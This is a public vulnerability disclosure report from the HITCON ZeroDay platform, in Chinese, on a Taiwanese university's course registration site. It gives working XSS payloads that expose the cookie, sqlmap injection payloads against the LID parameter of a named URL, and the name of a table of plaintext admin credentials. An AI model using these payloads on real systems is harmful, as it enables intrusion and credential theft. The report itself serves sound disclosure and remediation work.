亞東科技大學 推廣教育中心線上報名系統,網站參數存在 XSS 與 SQL injection - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2022-00249
  •  發信 Vendor: 亞東科技大學
  • Title: 亞東科技大學 推廣教育中心線上報名系統,網站參數存在 XSS 與 SQL injection
  • Introduction: 網站參數存在 XSS 與 SQL injection

處理狀態

目前狀態

公開
Last Update : 2022/05/03
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2022/04/10 00:25:20 : 新提交 (由 P@ssw0rd 更新此狀態)
  • 2022/04/11 13:53:39 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/04/11 15:48:58 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/04/11 15:48:58 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/04/11 15:48:58 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/04/28 13:07:06 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2022/04/28 23:24:19 : 未修補完成 (由 P@ssw0rd 更新此狀態)
  • 2022/04/29 09:28:04 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2022/04/29 20:00:37 : 確認已修補 (由 P@ssw0rd 更新此狀態)
  • 2022/05/03 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2022-00249
  • 通報者:wucy0612 (P@ssw0rd)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://eservice.aeust.edu.tw/lesson/
https://eservice.aeust.edu.tw/lesson/lesson_info.php?LID=1423

敘述

XSS

https://eservice.aeust.edu.tw/lesson/ 報名活動搜尋可成功觸發 XSS
圖片
圖片
圖片
關鍵字欄位 srh 值存在 XSS
xss payload :
"><img src=x onerror=prompt(domain)>
"><img src=x onerror=prompt(cookie)>

SQL injection

https://eservice.aeust.edu.tw/lesson/lesson_info.php?LID=1423
圖片
在LID加上' 無法正常顯示,送 sqlmap

Notice: Undefined property: DB::$_queryResource in D:\XXXXXXXXXXX\db.class.php on line 35 Warning: sqlsrv_fetch_array() expects parameter 1 to be resource, null given in D:XXXXXXXXXXXXx\db.class.php on line 35

Parameter: LID (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LID=1423 AND 6053=6053

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: LID=1423;WAITFOR DELAY '0:0:5'--

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: LID=1423 WAITFOR DELAY '0:0:5'

Type: UNION query
Title: Generic UNION query (NULL) - 24 columns
Payload: LID=-2541 UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(119)+CHAR(117)+CHAR(109)+CHAR(90)+CHAR(70)+CHAR(100)+CHAR(90)+CHAR(82)+CHAR(78)+CHAR(66)+CHAR(84)+CHAR(111)+CHAR(116)+CHAR(121)+CHAR(84)+CHAR(109)+CHAR(114)+CHAR(102)+CHAR(105)+CHAR(107)+CHAR(98)+CHAR(89)+CHAR(110)+CHAR(99)+CHAR(90)+CHAR(105)+CHAR(74)+CHAR(101)+CHAR(78)+CHAR(98)+CHAR(80)+CHAR(65)+CHAR(70)+CHAR(99)+CHAR(77)+CHAR(89)+CHAR(110)+CHAR(77)+CHAR(97)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VTPV

圖片

資料庫OIT_Recruit

資料表: tb_LessonLogin 為管理者帳號密碼
圖片

可以透過tb_LessonLogin帳號及密碼成功登入管理區
圖片

修補建議

1.處理SQLI與XSS: 參數過濾及禁止
2.弱密碼: 資料庫該表格 tb_LessonLogin 的密碼欄位(LessonLoginPd)無hash或其他加密儲存
3.管理區非請勿入: 限制只有內網可以存取目錄

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;